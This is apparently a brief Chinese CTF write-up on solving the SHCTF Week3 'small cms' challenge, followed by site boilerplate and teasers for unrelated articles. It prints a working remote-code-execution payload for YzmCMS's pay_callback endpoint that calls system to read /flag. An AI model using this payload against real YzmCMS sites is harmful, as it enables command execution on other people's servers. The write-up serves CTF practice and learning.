shctf[Week3] 小小cms

news/2024/10/24 20:54:00

看到首页面
了解到YzmCMS的版本,上网搜搜这个版本存在的漏洞
发现存在任意函数调用RCE的漏洞
https://blog.csdn.net/shelter1234567/article/details/138524342
根据文章直接抄payload,进入/pay/index/pay_callback目录下

下面cat /flag即可,最终的payload为
out_trade_no[0]=eq&out_trade_no[1]=cat /flag&out_trade_no[2]=system

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/75619.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

数据采集与融合技术实践作业二

数据采集与融合技术实践作业二

作业①:7日天气预报爬取 1. 作业代码与实现步骤 我们将在中国气象网爬取北京、上海、广州的7日天气预报,并将数据保存到数据库中。以下是实现步骤。 步骤详解打开中国天气网:在浏览器中访问中国天气网。搜索城市:输入“北京”并打开其天气页面。检查网页结构:使用浏览器的…
阅读更多...
clickhouse安装部署使用

clickhouse安装部署使用

一、安装 下载地址https://packages.clickhouse.com/rpm/stable/上传文件到Linux中开始安装1、进入到文件所在目录cd /usr/local/soft/clickhouse-rpms/2、使用rpm命令安装sudo rpm -ivh *.rpm3、查看状态systemctl status clickhouse-server4、启动服务systemctl start clickh…
阅读更多...
拦截器和过滤器的区别

拦截器和过滤器的区别

在软件开发中,拦截器(Interceptors)和过滤器(Filters)是两种常用的用于处理请求和响应的机制,但它们在功能、使用场景和实现方式上有着明显的区别。主要区别有:1.设计模式和工作原理;2.实现方式和配置;3.功能和使用场景;4.控制流程和灵活性;5.性能和效率;6.选择和应…
阅读更多...
Clickhouse的安装

Clickhouse的安装

一、官网下载 下载地址: https://packages.clickhouse.com/rpm/stable/ 一共需要下载这下面四个 注:一个页面没有的需要点击next进入下一个界面二、下载之后使用Xterminal打开所需要建立连接的虚拟机出现如下界面之后说明连接成功三、创建一个自己的文件夹,将先前下好的rpm文…
阅读更多...
Oracle 排序

Oracle 排序

在Oracle中,使用 ORDER BY 语法按字符串进行排序 ASC或DESC关键字:指定升序或降序排序,默认情况下,排序是升序的。 NULLS FIRST 或 NULLS LAST 关键字:指定对空值的处理方式,默认情况下,空值排在最后。 -- 按升序排序,空值排在最后 SELECT column_name FROM table_name…
阅读更多...
代码随想录算法训练营第24天(补第12天)| 递归遍历,迭代遍历,统一迭代

代码随想录算法训练营第24天(补第12天)| 递归遍历,迭代遍历,统一迭代

前置知识 二叉树的定义: struct BNode{int val;BNode* lchild;BNode* rchild;BNode():lchild(NULL),rchild(NULL){}BNode(int val){val=val;lchild=rchild=NULL;} };递归遍历文章链接:https://programmercarl.com/二叉树的递归遍历.html#思路 题目链接:https://leetcode.cn/…
阅读更多...
20222403 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222403 2024-2025-1 《网络与系统攻防技术》实验三实验报告

1. 实验内容 1.1.实践内容 (1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 veil,加壳工具 使用C + shellcode编程(2)通过组合应用各种技术实现恶意代码免杀 如果成功实现了免杀的,简单语…
阅读更多...
Camunda中的Execution listeners和Task listeners

Camunda中的Execution listeners和Task listeners

在Camunda中大多数节点元素都可以设置执行监听器(Execution listeners),例如事件、顺序流、用户任务、服务任务和网关。其中用户任务除了可以设置执行监听器,还可以设置独有的用户任务监听器,相比于执行监听器,用户任务监听器可以设置更加细粒度的事件类型。 下面针对执行…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023